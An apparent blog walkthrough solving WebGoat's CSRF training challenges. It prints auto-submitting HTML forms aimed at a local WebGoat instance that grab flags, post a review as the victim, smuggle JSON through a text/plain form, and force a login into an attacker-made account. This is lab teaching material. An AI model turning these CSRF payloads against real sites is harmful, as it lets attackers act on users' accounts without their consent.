WebGoat CSRF Challenges Solutions | Cross Site Request Forgery

WebGoat is a java based Web Application which used to demonstrate and teach students about web vulnerability. It is a deliberately insecure application that allows interested developers just like you to test vulnerabilities commonly found in Java-based applications that use common and popular open source components.

To install and run webgoat in your system please visit the below link :


Also to for basics information about CSRF attack please visist below link :

        Introduction to CSRF

The exploit codes used below are at : Github_repository

Now lets start with the CSRF challenges from webgoat.

The CSRF challenges are located on the 'Request Forgeries' tab.

Lessions 1 and 2 are the introductory for the CSRF challenges. The lession 3 is a challenge where we need to trigger the submit button from  our malicious page, which generate a flag value, and if we are able to successfully generate the flag value then copy and paste it on the Confirm Flag box, and the challenge will complete. Code for our CSRF exploit is :

<!-- WebGoat CSRF Chellange 3 solution-->
  <body onload="document.getElementById('xsrf').submit();">
    <form id="xsrf" method="GET" action="http://localhost:8080/WebGoat/csrf/basic-get-flag">
      <input name="csrf" type="hidden" value="true">
      <input type="submit" name="submitbtn">
The  above code is auto submitted web form with get request. Now when we open the above page "auto_get.html" then it will generate a flag.

Now we can submit the flag :

Now in Challenge 4 we have to post a review of someone else's behalf. The exploit code for this is :

<!-- WebGoat CSRF Chellange 4 solution-->
  <body onload="document.getElementById('xsrf').submit()">
    <form id="xsrf" method="POST"  action="http://localhost:8080/WebGoat/csrf/review">
      <input id="reviewText" name="reviewText" placeholder="This is hacked post" type="text">
      <input id="reviewStars" name="stars" type="text" value="5">
      <input type="hidden" name="validateReq" value="2aa14227b9a13d0bede0388a7fba9aa9">
      <input type="submit" name="submitbtn" value="Submit review">
The  above code is auto submitted web form with post request which post on the logged in users behalf. Now just open it on another tab, and it shows the below message :

and when we refresh the challenge page than there will be a posted message by the user.

Now there is next challenge in page 7 where, we have to send a message to an api in json format, within our CSRF page. The exploit code is :

<!-- csrf 7 challenge -->
  <body onload=document.getElementById('csrf').submit()>
    <form id="csrf" action="http://localhost:8080/WebGoat/csrf/feedback/message" method="POST" enctype="text/plain">
      <input name='{"name":"WebGoat","email":"webgoat@webgoat.org","content":"WebGoat is the best!!","padding":"' value='garbage"}' type='hidden'>
The above code will send the json request to the server and the server will return a flag.

Now paste the generated flag on the challenge page.

The 8th challenge is  a bit tricky, in this we have force the user to login with pur provided credential, so he can re-logged with our provided user credential. For this first we create another login with

        Username : csrf-hacker101
        password : 123456

and put the above configuration in our csrf exploit.

<!-- WebGoat CSRF Chellange 8 solution-->
  <body onload=document.getElementById('login').submit()>
    <form id="login" method="POST" action="http://localhost:8080/WebGoat/login">
      <input id="username" name="username" value="csrf-hacker101" type="text">
      <input id="password" name="password" value="123456" type="text">
Now when you are logged in with your old credentials, open the above page in another tab, and you will see that now you logged in with new credentials.

Conslusion :

So that's it about the CSRF challenges in WebGoat. For more web security related stuff :